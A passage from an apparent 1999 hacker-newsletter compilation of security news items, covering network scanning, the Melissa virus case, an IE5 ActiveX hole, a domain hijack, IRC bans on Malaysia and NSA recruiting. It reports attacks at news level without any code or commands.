has him spooked. He’s been demanding that PSINet, which
owns all the addresses in the 38.x.x.x range, chase down the
scanner and prosecute.
“I don’t think they understand how serious it is,” Pepelea
said. “The threat not so much being the nature of the scan but
the scope of the scan… If you’re between 38.240 and 38.200
you’ve had the scans. They’ve walked through and gotten to
you.”

NOSE FOR TROUBLE
The attack itself involves use of the Simple Network
Management Protocol, frequently used on network routers.
Pepelea owns machines between the 38.240 and 38.200
address range, and concluded scans spanned that range by
studying patterns of hits to his own and his client’s machines.


Dancing
tantalizingly over
the edge of the
law, they show an
ability to do far
more damage.


This is not the first time Pepelea, now CEO of a small
security company he calls “Designer’s Dream,” has done a
hefty amount of personal cybersleuthing. Last December, he
compiled information on a virus writer named VicodinES, and
shared it with the FBI, the CIA and other law enforcement
agencies. His tips fell on deaf ears, and VicodinES, who the
world now knows as Dave Smith, went on to release the
Melissa virus. Pepelea’s hell bent on being heard this time
around. “Once again, nobody cares,” he laments.
PSINet said early last week the scans were being
generated by an account serviced by the company, and that it
had dealt with the matter by canceling the account. But by
Friday, the company had canceled three more accounts in an
effort to stop the probes. While officials there say they take the
matter seriously, they are not convinced it’s an organized
hacker attack.


“It’s not possible to characterize whether this is a mistake,
a malicious event, was planned, or it just happened,” said Cole
Libby, Director of Network Engineering. For example, it could
a wrongly configured piece of hardware searching a section of
the Internet for a new printer. “There are lots of examples of
technology out of control in the world.”

NO HARM, NO FOUL?
Scanning, the cyberspace equivalent of walking down
Main Street and jiggling handles to see who leaves the front
door unlocked, brings up murky legal issues. Entering
someone else’s computer is illegal, but scanning, which
amounts to asking a computer how it’s been set up, probably
isn’t. Pepelea says PSINet told him to pursue legal action
against his cyberpest — but for what? Meanwhile, Pepelea
thinks PSINet should be liable if any real trouble ever comes
from his suspected hacker, particularly since the Net provider
was warned.
That’s not likely, says Internet law expert Dorsey
Morrow. PSINet would almost certainly face no criminal
liability for the actions of a hacker on their network, and
wouldn’t likely face civil liability either.
“As long as they can show ‘We were doing everything we
can. We’ve got security policies in place. We’re using the
latest software.’ That mounts up to a pretty good defense,”
Morrow said.
So there’s no consequences for scanning, either to the
hacker or the company that provides the means. But what of
Ruiu’s hackers, who go just one step further than Pepelea’s
scanners? They scan, then enter, lurk around, and leave.
Dancing tantalizingly over the edge of the law, they show an
ability to do far more damage.
Their methods are painstakingly deliberate, designed to
avoid detection. They launch attacks from multiple sites,
sometimes sending no more than a packet per day from any
site, in order to hide the kind of suspicious activity protective
“sniffer” programs look for.
“We saw one new machine coming at us every five
minutes,” Ruiu said. “They must have felt like gods because
they could break into any machine they wanted.”
That includes a collection of Canadian ISPs, and even one
major Canadian bank, the hackers broke into. When he
called, Ruiu often had a tough time convincing victimized ISP
administrators they’d been hacked.
“The reaction of ISPs was disbelief,” he said. “One didn’t
believe us until a marketing guy had his laptop taken out and it
started sending weird packets.”
Ruiu is convinced the hacks are coming from a
coordinated team, because of their speed and variety. But
while the cat-and-mouse game continues, he can only
speculate on motive. His company, a 15-person startup called
Netsentry.net, is hardly a big target. So Ruiu thinks his outside
efforts in the security community are likely to blame. He
recently worked on project called “Trinux,” which aimed to
create a security-enhanced version of Linux that fits on one
floppy disk. Among his partners was Ken Williams, who until
recently ran Packet Storm Security, perhaps the most popular
reference site in the hacker community.
“I suspect these guys are targeting security software,” he
said, but added they have not revealed their intentions. “This is
really bugging me. The lack of a motive really disturbs me…it
gave me the creeps.”
The attacks have also been humbling for Ruiu, who has
spent a lot of time chasing the hackers when he could be
working to get his business off the ground.
“There are a lot of assumptions we’re all making about
Internet security that we shouldn’t,” he said. ”“There’s a lot of
things we don’t know.”
For example, these hackers made a habit of hijacking
machines Ruiu’s computers normally talked to, then initiated
attacks from these supposedly “friendly” computers. That
made them almost impossible to detect.
“If they get a machine that’s close to your machine, that’s
almost as bad as taking over your Web server. It’s a great
place to launch an attack on your firewall,” he said.
Nothing about Ruiu or Pepelea’s stories surprised
ICSA’s Tippett, who expects security problems to get worse
before they get better.
“It’s the wild, wild West out there,” he said. “The tools
are pervasive and so common. The chance of getting caught is
pretty slim… Our neighbors are now very close and enough of
them don’t have a great social conscience.”
A more extensive report on the one of these attacks,
written by Ruiu, can be found at www.securityfocus.com.
If you have more information about this story, e-mail
tipoff@msnbc.com.


@HWA

16.0 Japanese Police Go After Copyright Infringers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Hosimi
The Akita Prefectural Police are investigating the
activities of a civil servant who allegedly posted
accounting software and MP3s to the internet in
violation of copyright law. The suspect had all of his
computer equipment confiscated last month.

Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/79863


Akita Prefecture Police Pursue Internet Crime
August 24, 1999 (TOKYO) -- The Akita Prefectural Police on Aug. 19 sent papers alleging unauthorized
Internet program delivery to the Akita District Prosecutor's Office, for prosecution.

The case is being pursued by the Kisakata Police Station.
In the case, a male civil servant residing in Akita Prefecture is believed to have been engaged in
unauthorized free delivery of personal computer programs and digital music data over the Internet.
The man is suspected of infringing on the right of public transmission under the Copyright Law.
According to the prefectural police, the man had registered accounting software of Obic Business
Consultants Ltd. and MP3-based musical data on his home PC. He is suspected of having posted these
programs on the Internet so that PC users can download them free of charge.<BR><BR>In June, the
Kisakata Police Station investigated the man's house and confiscated his PCs and peripheral equipment.
The police decided to send papers pertaining to the case to the district public prosecutor's office
because the free delivery of PC software was deemed to be illegal, it said.

The Japan Society of Rights of Authors and Composers has already accused the man of unauthorized delivery
of musical data.

The Akita Prefectural Police's task force specializing in high-tech crimes played a significant role in
this investigation. To combat the increasing number of high-tech crimes, the National Police Agency is
calling on prefectural police stations to organize task forces specializing in high-tech crimes, starting
in the current fiscal year. The task force set up by the Akita police has reportedly contributed
substantially to analysis of communications records and other matters related to the case.
(BizTech News Dept.)

@HWA


17.0 Anti-Gay Web domain Returned to Original Owner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Code Kid
Last week the web domain registration of
www.godhatesfags.com was altered to point to the
same people who own the www.godlovesfags.com. The
change was accomplished by someone using an
anonymous remailer with the internic registration
database. The admins of www.godlovesfags.com has
returned the domain to the original owner.

CNN
http://cnn.com/TECH/computing/9908/23/hack.folo/index.html

Anti-gay site goes back to
rightful owners

August 23, 1999
Web posted at: 4:52 PM EDT (2052 GMT)

By D. Ian Hopper
CNN Interactive Technology Editor

As slowly as it came, the road to love
veered back to hate on an anti-gay
Web site run by Pastor Fred Phelps
of the Westboro Baptist Church in
Topeka, Kansas.

Last Wednesday, domain name
registrar Network Solutions’ Internic
directory was fooled to associate the
godhatesfags.com domain name with
the server containing
godlovesfags.com, a pro-gay site.

Kris Haight, a systems administrator
at Sugar-River.Net, a New Hampshire Internet service provider, still
maintains that he did not make the change himself, and was the beneficiary of
a still-anonymous hacker. His site received about 70,000 page views after
the switch, which had only received a total of 7,500 page views prior to
Wednesday.

Haight finally relinquished the name on Friday, after pressure from his
employer and his employer’s service provider, a larger Internet provider
which sells connectivity to the smaller ISP. According to Haight, a lawyer
from the Phelps organization contacted the larger provider, Destek
Networking Group of Nashua, New Hampshire, and threatened action.
Destek then contacted Haight.

Haight then attempted to contact Phelps, leaving a message telling Phelps to
check his e-mail for a notice from Internic that the domain name was pointed
back to the original host server.

Phelps' organization refused to confirm the call to Destek, and continued to
downplay the incident. “It hasn’t hurt us one iota,” said Shirley
Phelps-Roper, Fred Phelps’ daughter and a lawyer for the organization. “It
demonstrated to the world that fags are what we said they are. These
experiences confirm what the scripture says about them. They are lawless;
nothing is sacred with them.”

T. Parsinnen, owner of Sugar-River.Net and Haight’s employer, said he
knew nothing of the change until after it happened. “We received an e-mail
giving a server change to godhatesfags, “ Parsinnen explained, “But I didn’t
notice anything in particular. I thought, ‘Oh, that’s Kris’s domain, I don’t
have to do anything about it.’ It was so close that it didn’t register to me
what it actually was.”

The next day, Kris told him what he did. “I said, ‘You’re going to have to
give that back,’ and he said he would.”

Parssinen said he doesn’t anticipate any legal action and will continue to host
the godlovesfags Web site. Haight is leaving the company for another job
opportunity. According to Parssinen, it’s just in time. “To demonstrate to
everybody that we had nothing to do with what took place, we would have
been forced to terminate his employment.”

A mystery remains, though. Who made the switch?

Parssinen said he doesn’t think Haight knew how to do it himself, and Haight
refuses to give any more information about the e-mail that told him to watch
for the switch, other than it was from an anonymous remailer. There’s plenty
of speculation, however, ranging from a Phelps ploy to sabotage himself in
order to get more media attention, to a result of the recent Chaos
Communication Camp in Germany, to a challenge made to hackers to
reassign a set of domain names.

Nevertheless, Network Solutions spokesperson Nancy Huddleston said that
there are three levels of domain name security, and relatively few choose the
highest level, password encryption. With that level, this sort of domain
redirection wouldn’t have been nearly as easy to do. “We just sent another
alert to our users telling them about the three levels of security,” Huddleston
said.

Even with more security, it seems almost inevitable that high-profile and
controversial sites will continue to be a prime target for attention-hungry
hackers. Phelps-Roper has resigned herself to that fact, reporting that the
godhatesfags site has been a target many times before, usually with
denial-of-service attacks.

You know there’s 365 days in a year, Phelps-Roper said, If we’re down
3, we’re still up the rest. We don’t really care.

(Gotta love their attitude, this kills me... bahahaha - Ed)

@HWA

18.0 EXPLOIT-DEV Mailing List Started
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ryan
In an effort to promote discussion on potential or
undeveloped holes a new mailing list has been created
by the folks at Security Focus. The list will be dedicated
to interactively developing exploits.

Security Focus
http://www.securityfocus.com/forums/exploit-dev/faq.html



We are pleased to host a new security mailing list that may be of
interest BUGTRAQ subscribers.


What is EXPLOIT-DEV?


There are many forums for reporting security bugs and distributing exploit
code or examples. A prime example of such a forum is the BUGTRAQ
mailing-list. However, nearly all of these forums exist mostly for the
dissemination of fully-researched reports, and they leave little room
for discussion. In addition, many bugs are spotted not written-up,
due to lack of interest, time, or expertise.


The EXPLOIT-DEV list exists to allow people to report potential or
undeveloped holes. The idea is to help people who lack expertise, time,
or information about how to exploit a hole do so.


The EXPLOIT-DEV list is dedicated to the concept of full disclosure. We
believe that release of exploit code serves the security community overall.
Since the list is dedicated to interactively developing exploits, there will
there will generally NOT be an opportunity to warn software vendors or
authors. In many cases it will not be clear that there is a problem until
the exploit or description is finalized, at which point all list subscribers
will know. It is very appropriate to notify vendors or authors as soon as
it is clear there is a problem.


For more information read http://www.securityfocus.com/forums/exploit-dev/faq.html


To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of:


SUBS EXPLOIT-DEV Firstname Lastname


--
Elias Levy
Security Focus
http://www.securityfocus.com/

@HWA



19.0 NetBus - Product Under Siege
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Judd
UltraAccess.net, the company that makes NetBus Pro, is
lashing out against Anti-Virus vendors for restricting
sales of its product by labeling the software as a virus.
Net Bus Pro 2.1 is a remote administration tool similar to
Back Orifice that allows an administrator to control a
remote system. UltraAccess.net is claiming that AV
vendors like Symantec think that NetBus is competition
for their remote administration software and that is why
it is being flagged by the AV software. UltraAccess says
that unless some sort of agreement can be reached
they may purse legal action against AV companies for
defamation and restraint of trade.

UltraAccess.net
http://www.ultraaccess.net

@HWA

20.0 Worst Security Hole Ever?
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
This new hole in Internet Explorer 5 allows an
infocriminal to place a program on a victim's hard disk
that will be executed at the next reboot. The bug can
be exploited from a user opening a web page or reading
an email. The problem is located with an Active X
control called "Object for constructing type libraries for
scriptlets". Microsoft is working on a fix, in the meantime
users are urged to turn off Active X within their
browsers. (Sure glad I use Netscape.)

George Guninski's Home Page - Demo and Source Code Available
http://www.nat.bg/~joro/
Internet News
http://www.internetnews.com/prod-news/print/0,1089,9_188461,00.html


New IE5 Security Bug the Worst Ever?
August 24, 1999
Brian McWilliams, InternetNews.com Correspondent
Product News Archives


Bulgarian browser bugmeister Georgi Guninski is at it again. The 27-year-old
independent computer consultant has discovered a new security flaw affecting
Internet Explorer 5, which enables a malicious hacker to place a program on the
victim's hard disk, to be executed at the next reboot.

Guninski is credited by Microsoft with discovering and publicizing a number of
significant security flaws in its Internet Explorer browser in the past year. While he's
also spotted several security bugs in Netscape's Navigator, Guninski is especially
fond of poking holes in Active X, the scripting technology used in IE.

"I think this is the most significant of my discoveries and the most dangerous also,"
Guninski told InternetNews Radio. "It allows a Web page or e-mail message to
take control of the computer and do anything."

According to Guninski, the attack can be launched by causing IE5 users to click on
a hyperlink on a web page, but it also can be transmitted by e-mail to users of
Microsoft's Outlook 98. The exploit places an executable program in an HTML
Application file in a Window 95 or 98 computer's start-up folder. When the victim
reboots his or her computer, the program will execute.

Guninski said the problem lies in an Active X control called "Object for
constructing type libraries for scriptlets". He has posted a demo and source code of
the exploit at his Web site.

Microsoft officials were not immediately available for comment. Guninski asserts
that the company has reproduced the bug and plans to issue a patch. In the
meantime, concerned IE5 users can protect themselves by going into security tab of
the browser's Internet Options menu, and disabling ActiveX controls or plug-ins.


@HWA

21.0 IRC Banned in Malaysia
~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by AlienPlague
Undernet, EFnet and DALNet, Internet Relay Chat
Networks, had banned users from Malaysia for seven
days last week. Both of Malaysia's Internet service
providers Jaring and TMNet ISPs had been banned from
using the networks effectively cutting off the entire
country. The ban was due to users in the country
abusing the networks services. After discussions with
both ISPs the ban was lifted last Friday.

South China Morning Post
http://www.technologypost.com/internet/Daily/19990824110643506.asp?Section=Mai

INTERNET

Malaysians banned
from global IRC
network

NEWSBYTES

Undernet, a worldwide Internet Relay Chat (IRC)
network that allows people to connect to its
privately-run computer servers free of charge to
communicate in real time over the Internet, has banned
Internet users from both of Malaysia's only two Internet
service providers (ISPs) for abusing its services.

Although Undernet is one of many IRC networks, it is
one of the largest and joins two of the other largest -
DALNet and EFnet - in instituting temporary or
permanent bans on Internet users logging on from the
Jaring or TMNet ISPs in Malaysia.

Bans typically run for several hours to days or weeks
depending on the network and the level of abuse and
the response of ISPs to complaints from IRC network
administrators.

Within the IRC community, abusive behaviour ranges
from repeated offensive behaviour toward other users,
automatically flooding chat rooms with multiple
messages, running robot programs and launching denial
of service attacks against other users or the servers
themselves (basically, trying to hack the system and
bring it down).

Because Internet users often connect from dial-up
connections it is impossible for IRC networks to identify
and ban an individual user as they can just log out and
return with a different IP address.

This is where IRC administrators ask ISPs for
assistance with serious offenders who do not respond to
IRC operators requests to cease online.

Since the ISP can connect an IP address at any point in
time to a particular user, they are in a position to pass
on a warning or even account termination if hacking is
against the ISP's terms of service, which is the case for
most ISPs worldwide.

IRC networks do not usually take the next step and ban
a whole ISP's domain, and so all of its users guilty and
innocent, unless the ISP is unresponsive to abuse
reports.

Undernet found that Jaring and TMNet administrators
ignored abuse reports and so they were forced to ban
all users from both services for seven days last week.

"In the last few months alone, over 182,300 global bans
have been set against various address's in the *@*.my
domain," read an Undernet.org e-mail sent to Jaring and
TMNet.

"We simply cannot afford to absorb the costs of these
attacks any longer.

"We must either reach some form of working,
responsible relationship with the administrators of the
various *.my providers, or these bans will become
permanent.

"Basically, we are only asking that they support and
enforce their own policies they have in place already."

Undernet lowered the bans against Jaring on Friday
after some discussion between the two organisations.

The network presented the ISP with a list of requests
and suggestions for abuse management. TMNet, the
ISP arm of national telco Telekom Malaysia, had not
contacted Undernet on Friday and on Sunday a
permanent ban was placed on the TM.net.my IP space.

Undernet officials said that the bans were not about
Malaysian Internet users being particularly worse
behaved than any other country's. They said it was
about "irresponsible and unresponsive administration of
the Malaysian ISPs".

"We are not singling out Malaysia, but it is in general is
the most abusive domain currently accessing the
Undernet," said Undernet.

"Malaysian IP space and resources are being used to
launch denial of service attacks and the last attack
against one of our routing servers was the straw that
broke the camel's back."

Undernet estimated it costs its hosts US$2.2 million in
bandwidth alone to run the Undernet network each
year. At times more than 30,000 users are connected
simultaneously from all around the world.

@HWA


22.0 I want my, I want my, I want my HNN - more goodies from HNN
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue
Monday HNN announced that the new Java HNN News
Ticker is available on the Affiliate Resources page.
Today we are happy to announce several new ways
which you can receive your HNN. With our new XML
backend we now have channels on My Netscape and My
Userland. This is in addition to our box on Slashdot and
our previously announced PQA for the Wireless Palm
Pilot. We've got even more features in the works so
keep your eyes open.

I want my HNN
http://www.hackernews.com/misc/myhnn.html

@HWA

23.0 Melissa Creator Admits Guilt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid
David L. Smith, the man who has been charged with
creating and disseminating the Melissa virus, admitted
to investigators that he did it, according to court
papers. Lawyers for the defense dispute that an
admission of guilt was made. Smith has pleaded not
guilty to charges of interrupting public communication,
conspiracy, theft of computer service, and wrongful
access to computer systems. David Smith remains free
on $100,000 bail.

C|Net
http://www.news.com/News/Item/0,4,40912,00.html?st.ne.fd.mdh.ni

Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,85786-135501-944958-0,00.html

CNN
http://www.cnn.com/US/9908/25/melissa.virus.ap/index.html



C|Net;

Court papers: Smith admits to creating Melissa virus

By Erich Luening
Staff Writer, CNET News.com
August 25, 1999, 8:25 a.m. PT

update The New Jersey man charged with creating the Melissa virus, which disrupted
computers around the world, admitted to investigators that he did it, according to court papers.

On April 1, David L. Smith was arrested by federal and state officials and charged with creating and
disseminating the Melissa virus that began spreading across the Internet March 26.

Smith, 30, a resident of Aberdeen Township, New Jersey, was arrested at the home of his brother in
Eatontown, New Jersey. Smith was tracked down with the help of America Online and by traced phone calls.

A spokesman for the New Jersey Attorney General's office told CNET's News.com that the prosecution "expects to see some
kind of resolution by September." He would not elaborate further.

A brief filed in state superior court by supervising deputy attorney general Christopher G. Bubb said Smith waived his Miranda
rights and spoke to investigators when police arrived at his apartment, according to a courthouse spokesperson.

Smith admitted to writing the "Melissa" macro virus, illegally accessing America Online for the purpose of posting the virus onto
the Internet, and destroying the personal computer he used to post the virus, Bubb stated.

The state attorney filed his brief in response to a motion made by Smith’s attorney Edward F. Borden Jr. seeking certain
prosecution documents.

The FBI continues to provide assistance to New Jersey prosocuters in the case. Federal charges have not been levied against
Smith. "The decision to bring federal charges against Smith is at the descretion of the U.S. Attorney," said FBI spokesperson
Debbie Weierman.

In April, Smith pleaded not guilty to charges of interrupting public communication, conspiracy to commit the offense, and the
attempt to commit the offense. He also pleaded not guilty to charges of two lesser offenses: theft of computer service and
wrongful access to computer systems.

If convicted on the state charges, Smith faces a maximum of 40 years in prison and fines of $480,000.

AOL tipped the New Jersey attorney general's office to the virus's originator. AOL said it had tracked the source through a
listserver to Monmouth County, New Jersey.

Since his arrest, Smith has changed attorneys.

The Melissa virus was first introduced on an "alt.sex" newsgroup using the AOL account of Scott Steinmetz, whose username
was "skyroket." Steinmetz, a civil engineer in Lynnwood, Washington, told CNET News.com that he had nothing to do with writing
or introducing the virus.

The virus used a combination of Microsoft's Outlook and Word programs to spread, taking advantage of users' email address book
entries to gain the appearance of coming from a known person.

Smith remains free on $100,000 bail.

Nando Times;

Accused admitted creating 'Melissa' virus, prosecutor says

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

From Time to Time: Nando's in-depth look at the 20th century.

FREEHOLD, N.J. (August 25, 1999 10:57 a.m. EDT http://www.nandotimes.com) - The man charged with creating the Melissa computer virus that
clogged e-mail systems around the world last spring admitted he created the bug, a prosecutor alleges in court papers.

David L. Smith, a former computer programmer, was arrested in April.

A brief filed in state Superior Court by Supervising Deputy Attorney General Christopher G. Bubb says Smith waived his Miranda rights and spoke to
investigators when police arrived at his apartment.

"Smith admitted, among other things, to writing the 'Melissa' macro virus, illegally accessing America Online for the purpose of posting the virus onto
cyberspace, and destroying the personal computers he used to post 'Melissa,'" Bubb wrote.

Defense lawyer Edward P. Borden Jr. told the Asbury Park Press of Neptune that he disputes Bubb's assertions. He refused to comment further, the
newspaper reported Wednesday.

The Melissa virus was disguised as an e-mail marked "important message" from a friend or colleague of each recipient. It caused affected computers
to create and send 50 additional infected messages. The volume of messages generated slowed some systems to a crawl.

Authorities say the virus was named after a topless dancer in Florida.

Bubb's brief was filed in response to a defense motion seeking additional prosecution documents.

Borden says he needs the prosecution documents to file a motion to suppress evidence seized during the search of Smith's apartm

  
ent. A hearing on
his motion was to be held Wednesday afternoon.

Smith is charged with interruption of public communications, conspiracy and theft of computer service. The maximum penalty for the offense is 40
years in prison.

He remains free on $100,000 bail.

CNN;

Prosecutor says man
admitted creating 'Melissa'
computer virus

August 25, 1999
Web posted at: 10:49 AM EDT (1449 GMT)

FREEHOLD, New Jersey (AP) --
The man charged with creating the
Melissa computer virus that clogged
e-mail systems around the world
admitted he created the bug, a
prosecutor alleges in court papers.

David L. Smith, a former computer
programmer, was arrested in April.

A brief filed in state Superior Court by Supervising Deputy Attorney General
Christopher G. Bubb says Smith waived his Miranda rights and spoke to
investigators when police arrived at his apartment.

"Smith admitted, among other things, to writing the 'Melissa' macro virus,
illegally accessing America Online for the purpose of posting the virus onto
cyberspace, and destroying the personal computers he used to post
'Melissa,' " Bubb wrote.

Defense lawyer Edward P. Borden Jr. told the Asbury Park Press of
Neptune that he disputes Bubb's assertions. He refused to comment further,
the newspaper reported today.

The Melissa virus was disguised as an e-mail marked "important message"
from a friend or colleague of each recipient. It caused affected computers to
create and send 50 additional infected messages. The volume of messages
generated slowed some systems to a crawl.

Authorities say the virus was named after a topless dancer in Florida.

Bubb's brief was filed in response to a defense motion seeking additional
prosecution documents.

Borden says he needs the prosecution documents to file a motion to
suppress evidence seized during the search of Smith's apartment. A hearing
on his motion was to be held Wednesday afternoon.

Smith is charged with interruption of public communications, conspiracy and
theft of computer service. The maximum penalty for the offense is 40 years
in prison.

He remains free on $100,000 bail.

@HWA

24.0 cDc Responds to Allegations About HKBs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
Oxblood Ruffin, from the Cult of the Dead Cow, gives an
interview about the existence of the Hong Kong
Blondes. The HKBs are a group of Chinese dissidents
who are trying to destabilize the Chinese Government
through the Internet. Last week a report was issued
that there was no evidence to support their existence
and concluded that therefore they must not exist.

IT Daily
http://www.itdaily.com/daily.lasso?-database=dailybasepublic&-layout=today&-response=itdailyfree.htm&-recid=39830&-search



Thursday, August 25, 1999
Cult claims Hong Kong hackers are real
threat



US hackers respond to itdaily.com story

By Neil Taylor

Leading US hacker group the Cult of the Dead Cow has told itdaily.com that elusive Chinese hackers
the Hong Kong Blondes are operating in Asia.
According to the CDC, the Blondes are a group of Chinese dissidents who aim to destabilise the
Chinese Government through the Internet. Along with an offshoot named the Yellow Pages, the
group threatened to use information warfare to attack China's information infrastructure. The group
threatened to attack both Chinese state-owned organisations and Western companies investing in the
country.
When the group was first reported, the CDC claimed to be training the Blondes in encryption and
intrusion techniques.
A recent investigation by itdaily.com found no evidence of the group's existence. Despite
approaching the Hong Kong ISP Association, the Hong Kong Government, Police, universities,
security experts and hackers alike, nobody contacted by itdaily.com knew anything about the group.
However, CDC foreign minister OXblood Ruffin told itdaily.com that the Hong Kong Blondes are
for real, and that they are operating in Asia. The chief organisers, nicknamed Blondie Wong and
Lemon Li, were last reported to be based in India.
"The Blondes do exist, although the CDC has truncated our official relationship with them," said
Ruffin. "The Yellow Pages on the other hand briefly existed but were shut down by me."
Ruffin said that the reason the group has been so low-key is that they operate secretly to avoid
compromising members in China "They're hyper secure. They're organised in cells of three members
with no one but Blondie and Lemon knowing the entire membership."
The CDC has portrayed the Hong Kong Blondes as "hacktivists"; meaning they break into
computer networks for political ends. "The Yellow Pages got together and they were gonna do
support work to draw attention to social justice issues in China linked to current trading practices on
the Western side..."
Ruffin said that he later learned that the group planned to shut down the networks of a number of
large US corporations, at which point he decided to disband the group and disassociate himself with
the Hong Kong Blondes.
"The American public would not have supported any such adventure and it would have worked
seriously against the cause," he said.
He added that the CDC no longer maintains any relationship with the group.
As previously reported in itdaily.com, the first and only Hong Kong Blondes interview was leaked
to the press by the CDC just one month before the group released its well-known remote
administration tool Back Orifice. BO can be installed on a Windows PC without the user's knowledge,
giving full control over the machine to unauthorised third parties.
Since then, Back Orifice has become widespread internationally, particularly in China.
There is still no evidence beyond the word of OXblood Ruffin that the Hong Kong Blondes do, in
fact, exist, but as Ruffin's e-mail signature notes: "First we take the networks, then we take Peking."

@HWA


25.0 $50G Offered in 'Hacker Challenge' Publicity Stunt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Yazmon
Global Markets Research (GMR), a UK company, has
offered $50,000(US) to anyone who can break their
proprietary email system within three months. The
company designed 1on1 e-mail "to guarantee complete
confidentiality", the program uses 2048 bit encryption
while email is in transit and can autodelete email after it
has been read.

BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_430000/430084.stm

1 on 1 Mail
http://1on1mail.com


HNN has stated its feelings about these 'Hacker
Challenges' before. These should not be considered
adequate testing methods. Reasons, 1) Most people
with the knowledge to break systems like this are busy
making bigger money elsewhere, 2) The real bad guys
don't want to give away their secrets, 3) this is not a
controlled environment conducive to good research.

If companies want publicity and a good test of their
security then they should hire someone like NMRC, Phar
Lap, L0pht, eEye, or any other independent third party
security experts to review their software.

NMRC.....: http://www.nmrc.org
Phar Lap.: http://www.pharlap.com/
L0pht....: http://www.l0pht.com
eEye.....: http://www.eeye.com/

BBC:

Thursday, August 26, 1999 Published at 08:15 GMT 09:15 UK


Sci/Tech

The self-destructing e-mail

Providing secure e-mail is a growing business

A new program can send e-mail messages which
self-destruct after a set time.

Its developers claim this will protect senders from having
ill-judged electronic words used against them later.

The most high-profile instance came last year when
Microsoft's Bill Gates had to defend himself against his
own e-mails in a US antitrust case.

Hack it if you can

UK company Global Markets Research (GMR) designed
1on1 e-mail "to guarantee complete confidentiality".

It uses 2,048-bit public key encryption to secure the
message in transit and GMR have such confidence in it
that they are offering $50,000 to anyone who can hack
into a message within three months.

The self-destruct feature is called autoshredder and the
package also prevents recipients from just cutting and
pasting out of it. "That would be pointless," GMR's
technical director, Steven James told New Scientist
magazine.

1on1mail also ensures that the e-mail is not stored
anywhere on the recipient's computer. Finally, when the
message self-destructs, it is overwritten on the disk, so
it cannot be undeleted later.

Gimmick jibe

However, critics have been quick to give their views.
"2,048-bit encryption is ridiculous," cryptographer Bruce
Schneier told technical news Website ZDNN. "It is
irrelevant. The security is determined by the password
anyway. If the user picks a bad one, the security is
bad."

Hushmail, a rival encrypted e-mail service, dismissed the
self-destruct feature as a gimmick.

Another fear is that e-mails used to send viruses or
trojans could destroy themselves along with any
evidence.


@HWA


26.0 NSA Recruiting In the Underground
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ender
The National Security Agency has been actively
recruiting at least one member of the underground
community. Ender Wiggin, editor of OSAll web site has
received offers for free tuition to a four year college,
salary, and room and board, in exchange for working for
the NSA for five years after graduation. After noticing
the NSA was visiting his web site he sent an inquiring
email and then received the offer to join this program.

OSALL - NSA and Kids
http://www.aviary-mag.com/News/NSA_and_Kids/nsa_and_kids.html

OSALL - Ender and CNN
http://www.aviary-mag.com/News/CNN/cnn.html



The NSA is actively recruiting high school kids, offering to
pay for college -- and a salary to boot.


The NSA and Kids

Mike Hudack
Editor-in-Chief

They were visiting the Web site daily. Every day they downloaded all
the new files and left. Who were they? The National Security Agency.
The NSA was created in the fifties with a mandate to read other nations´
mail and keep our mail from being read. Since then they´ve moved into
computer security in addition to their original cryptology.

Curious, I sent an e-mail to the registered custodian of the address
visiting the site. It must have been referred around the mulberry bush
because someone else answered. "Do you know about our college
programs?" this new person asked... I didn´t.

Apparently the NSA actively recruits students in high school (only local
to Fort Meade) and college. The NSA employee asked for my address
and received it.

About two weeks later I received a hand-addressed manila envelope
(which has been broadcast on CNN) containing a series of glossy
recruitment brochures touting an "opportunity the brightest students
cannot afford to miss."

They had no idea about my academic qualifications when they told me
about the program -- or at least I didn´t tell them. My academic
credentials are, however, quite good with the exception of attendance.

About a week after I received the brochures I received another e-mail
from this NSA employee who I was now recognizing as a recruiting
officer. He told me that I could "definately get into the program," and
that I would be able to go to "any college [I] want," suggesting they
could get me into the colleges.

Since then he´s e-mailed me almost weekly asking if I´ve applied.

This happened to me almost half a year ago now, and I´ve since spoken
to others who have been the subject of recruiting efforts. One teenager
told me "they were very enthusiastic. Kept telling me how I could get
paid for going to college... They sounded like the Army." And well they
should -- they are part of the Department of Defense.

The offer is pretty simple, and anyone can apply. If you plan to study
computer science, electrical or computer engineering, mathematics or
language in college, the NSA will allow you to apply. You must have at
least a 1200 on your SATs and a 3.0 GPA. In return for four years of
college, a salary, room and board, you must work for NSA for five
years post-graduation.

Most of the people the NSA is targetting in this recruiting program seem
to have problems with the idea. Most, including me, disagree with the
NSA´s cryptology policies (read: key escrow and export limitations).
Likewise, however, the opportunity is certainly an amazing one.

Related Links:

National Security Agency
http://www.nsa.gov
NSA Names Schools
http://www.aviary-mag.com/News/Old_News/NSA_Colleges/nsa_colleges.html



Ender & CNN

Mike Hudack
Editor-in-Chief

Mike Hudack, aka Ender Wiggin, editor of OSAll, was profiled on the
Cable News Network beginning on Monday. The entire profile will run
on Saturday on CNN at 1:30pm eastern time.

The story focuses on the fact that I´ve been actively recruited by the
National Security Agency. To find out more about it you´ll have to
watch :-)

A segment of the story originally ran on CNN Headline News on
Monday, repeating every half hour. Subsequently it ran on CNN
World Today at 10pm eastern. It ran again on CNN´s morning show
on Tuesday morning.

